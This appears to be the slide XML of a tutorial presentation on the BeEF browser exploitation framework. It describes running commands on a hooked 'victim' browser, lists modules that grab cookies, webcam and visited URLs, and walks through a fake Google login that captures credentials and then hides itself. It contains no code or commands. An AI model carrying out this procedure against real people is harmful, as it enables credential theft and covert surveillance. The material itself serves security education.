          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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32D6C612-6750-A791-4325-FFA00402CB16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564777" y="447798"/>
            <a:ext cx="6096000" cy="458074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Step 4: Executing commands on the victim’s browser</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BB1383EB-EFA2-4908-6077-B78C04912EEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600636" y="1013734"/>
            <a:ext cx="11134164" cy="1289071"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:sp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We now have a beef hacking hook on the victim’s browser and we can execute numerous commands within the beef hacking framework in order to collect important information we may require from the victim’s browser.  some of the capabilities available on beef hacking framework are as shown below categorically.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832E31F2-DE6B-F36A-4712-73F7B201875B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2970810" y="2302805"/>
            <a:ext cx="6393815" cy="4236256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187576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307FF-005C-6F69-C693-93CB4FC3FB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04E9F5D8-599E-453A-AC42-FF6CB32BD6AA}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 10:00 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6265A86A-0E14-EC96-BD30-D14C496EB16E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C38912EB-2D7F-79E1-A5AD-5C995594F30C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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FEC784C2-B16C-DE26-001A-8266A101A06D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770964" y="433076"/>
            <a:ext cx="10936941" cy="3366563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>As you can see, we have over 100 commands which we can use against the victims’ browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>There are over 300 modules, from browser hacks to social engineering, including, but certainly not limited to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="3175"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Get Visited Domains (browser)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="3175"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Get Visited URLs (browser)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="3175"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Webcam (browser)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="3175"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Get All Cookies (extension)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="3175"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Grab Google Contacts (extension)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="3175" lvl="0" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>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Screenshot (extension)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98CE39A5-32FD-6B7F-6F34-0F13DC913AD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770964" y="3799639"/>
            <a:ext cx="6320118" cy="1216487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="3175" lvl="0" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>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Steal Autocomplete (social engineering)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="3175" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pP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3175" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>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Google Phishing (social engineering)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="3175" lvl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAf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7156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132CD3-8803-C6CF-A3D7-5C60C5D90868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04E9F5D8-599E-453A-AC42-FF6CB32BD6AA}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 10:11 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AE8C5A4-EF9F-6F96-9B86-9F12DA4FD6DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A650FC3-C2C6-F555-AD21-99F8171D43F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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5F252F19-4D9B-3ECA-C19A-27679CEECA39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322729" y="483657"/>
            <a:ext cx="6096000" cy="458074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Step 5: Launching a social-engineering attack</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01FE78C0-08EE-37FA-5DE2-691A3AD4AD9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421340" y="1018417"/>
            <a:ext cx="11358283" cy="873572"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:sp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In this guide we will try and carry out a social engineering attack on our victim in order to acquire the user’s login details. we just have to select the command we need and execute it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A9EC20F-C407-C34C-87AD-5C0593A56585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2862967" y="2061882"/>
            <a:ext cx="6863739" cy="3777701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="126868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DD8BCB-84A2-BBD0-A481-C3E6E89C1E5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04E9F5D8-599E-453A-AC42-FF6CB32BD6AA}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 10:13 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DA57481-BB9A-6DA3-73AD-41BA55B9BF7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{694AFBAB-8411-79AC-4A56-EA7A192D2897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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4FBF10F-4449-AA0F-07D3-B819728A0627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537882" y="380363"/>
            <a:ext cx="11125199" cy="873572"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:sp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We will be acquiring the user’s g mail login details. Once we execute the command, the victim will be redirected to a webpage similar to the google login page requiring him/her to her username and password as shown below.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA506AC0-D361-D709-576F-78EDA9B8DBE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2862967" y="1669676"/>
            <a:ext cx="6393815" cy="2830606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2EC0EB-E565-700E-AD34-6C6821CFA71B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726141" y="4607859"/>
            <a:ext cx="10936940" cy="1289071"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:sp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And once the user enters his/her username and password we will be ale to view it right from our beef hacking framework (see image below). After the user clicks the sign in button, he/she will be redirected to the official google sign in page. This aids in making the attack more stealth.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345975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43358B-E2B6-CC39-FB5D-99BED32723FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04E9F5D8-599E-453A-AC42-FF6CB32BD6AA}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 10:14 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62FBCDF8-3D1F-A331-8DFA-89B53145E619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12BA5D9F-56A0-4011-9036-BF8C8B423D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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descr="Beef Hacking Framework Explained [5 Easy Steps]">
            <a:hlinkClick r:id="rId2"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{163C3AA0-D919-EF6F-BB39-2E3311E1BD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2904" y="429276"/>
            <a:ext cx="7643402" cy="4330981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8F0AAD0-6852-5636-8387-82C1238A4B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="559301" y="4911384"/>
            <a:ext cx="11211358" cy="873572"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:sp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We now have the user’s email username and password. Beef hacking framework also acts as an advanced keylogger and it is able to collect the keys that have been clicked by a victim while using the browser this makes it more dangerous.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3411437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Conclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46B005A9-C8F9-55F9-05C9-7227495DEB3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="143435"/>
            <a:ext cx="11887200" cy="6535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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E20CB83-E070-4071-B031-41F440739D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D0AB03BD-A0C9-4DB8-8E75-69F483C63C62}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32B74876-1916-0A08-D732-CACF44198A44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{835AED06-2010-46D7-9060-D7A07C46E1C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="851646" y="1355675"/>
            <a:ext cx="10694895" cy="4613058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>We conclude that, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
